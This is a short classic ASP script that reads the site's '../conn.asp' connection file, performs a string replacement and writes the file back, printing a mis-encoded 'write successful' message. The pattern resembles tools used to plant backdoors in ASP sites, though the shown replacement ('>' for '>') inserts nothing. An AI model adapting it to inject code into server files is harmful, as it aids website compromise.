<% str=">" fname="../conn.asp" set fso=server.createobject("scripting.filesystemobject") set file=fso.opentextfile(server.mappath(fname),1,True) FSOFileRead = file.ReadAll set file=nothing FSOFileRead=Replace(FSOFileRead,">",str) Set outfile = fso.CreateTextFile(Server.Mappath("../conn.asp")) outfile.Write FSOFileRead outfile.close Set outfile=nothing Set fso=nothing response.Write("дÈë³É¹¦") %>